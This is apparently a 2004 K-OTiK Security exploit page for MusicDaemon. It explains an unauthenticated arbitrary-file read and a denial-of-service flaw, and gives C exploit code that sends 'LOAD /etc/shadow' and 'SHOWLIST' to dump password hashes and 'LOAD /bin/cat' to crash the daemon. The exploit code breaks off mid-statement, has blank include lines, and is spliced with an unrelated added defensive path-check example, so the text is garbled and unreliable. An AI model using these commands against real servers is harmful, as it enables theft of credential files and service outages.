MusicDaemon

/* MusicDaemon  
* 
* Hello 
*  
* ...... 
* bin:*:9797:0::::: 
* ftp:*:9797:0::::: 
* sshd:*:9797:0::::: 
* ...... 
* for privacy> 
* 
*  
* 
* root@vortex:~/test# 
* 
* Server Side View: 
* 
* root@vortex:~/test/musicdaemon-0.0.3/src# ./musicd -c ../musicd.conf -p  1234 
* Using configuration: ../musicd.conf 
* [Mon May 17 05:26:07 2004] cmd_set() called 
* Binding to port 5555. 
* [Mon May 17 05:26:07 2004] Message for nobody: VALUE: LISTEN-PORT=5555 
* [Mon May 17 05:26:07 2004] cmd_modulescandir() called 
* [Mon May 17 05:26:07 2004] cmd_modulescandir() called Binding to port 1234. 
* [Mon May 17 05:26:11 2004] New connection! 
* [Mon May 17 05:26:11 2004] cmd_load() called 
* [Mon May 17 05:26:13 2004] cmd_show() called 
* [Mon May 17 05:26:20 2004] Client lost. 
* 
* 
* As you can see, it simply makes a connection, sends the commands, and 
* leaves. MusicDaemon doesn't even log that new connection's IPs that I 
* know of. Works very well, eh? :) 
* 
* The vulnerability is in where there is no authentication for 1. For 2, it 
* will let you "LOAD" any file on the box if you have the correct privileges, 
* and by default, as I said before, it runs as root, unless you change the 
* configuration file to make it run as a different user. 
* 
* After we "LOAD" the /etc/shadow file, we do a "SHOWLIST" so we can grab 
* the contents of the actual file. You can substitute any file you want in 
* for /etc/shadow, I just coded it to grab it because it is such an 
* important system file if you know what I mean ;). 
* 
* As for the DoS, if you "LOAD" any binary on the system, then use "SHOWLIST", 
* it will crash music daemon. 
* 
* 
*/ 
  
  
#include <stdio.h>   /* printf */
#include <string.h>  /* strlen */
#include  
#include  
#include  
  
int main(int argc, char *argv[]) { 
  
char buffer[16384]; 
  
char *xpldata1 = "LOAD /etc/shadow\r\n"; 
char *xpldata2 = "SHOWLIST\r\n"; 
char *xpldata3 = "CLEAR\r\n"; 
char *dosdata1 = "LOAD /bin/cat\r\n"; 
char *dosdata2 = "SHOWLIST\r\n"; 
char *dosdata3 = "CLEAR\r\n"; 
  
int len1 = strlen(xpldata1); 
int len2 = strlen(xpldata2); 
int len3 = strlen(xpldata3); 
int len4 = strlen(dosdata1); 
int len5 = strlen(dosdata2); 
int len6 = strlen(dosdata3); 
  
if(argc !=  4) { 
printf("\nMusicDaemon   
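A server-side check that would refuse the `LOAD /etc/shadow` request described in the comment above, as an added example that is not part of the original exploit or of MusicDaemon's source. The function name `load_path_allowed` and the `/srv/music` media root are hypothetical; the check covers only the arbitrary-file read, not the missing authentication or the daemon running as root.

```c
/* Added example (not MusicDaemon code): confine a LOAD argument to a media root. */
#define _XOPEN_SOURCE 700
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>

/* Returns 1 and fills `out` (PATH_MAX bytes) with the canonical path if
 * `requested` is a regular file under `media_root`; returns 0 otherwise.
 * `media_root` stands for a hypothetical configuration value. */
int load_path_allowed(const char *media_root, const char *requested, char *out)
{
    char root[PATH_MAX];
    struct stat st;
    size_t n;

    /* realpath() resolves symlinks and "..", so the comparison below is made
     * on the file that would really be opened. */
    if (realpath(media_root, root) == NULL || realpath(requested, out) == NULL)
        return 0;
    n = strlen(root);
    /* Require "root/" as a prefix, so /srv/music2 does not match /srv/music. */
    if (strncmp(out, root, n) != 0 || out[n] != '/')
        return 0;
    /* Playlists are regular files: refuse devices, FIFOs and directories. */
    if (stat(out, &st) != 0 || !S_ISREG(st.st_mode))
        return 0;
    return 1;
}

int main(void)
{
    char resolved[PATH_MAX];
    /* Constructed inputs; /srv/music is an assumed media root, and the first
     * path is allowed only when that file exists on the machine. */
    const char *tests[] = { "/srv/music/list.m3u", "/etc/shadow",
                            "/srv/music/../../etc/shadow" };
    for (size_t i = 0; i < sizeof tests / sizeof tests[0]; i++)
        printf("LOAD %-32s -> %s\n", tests[i],
               load_path_allowed("/srv/music", tests[i], resolved)
                   ? "allowed" : "refused");
    return 0;
}
```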


All rights reserved © 2002-2004 K-OTiK Security
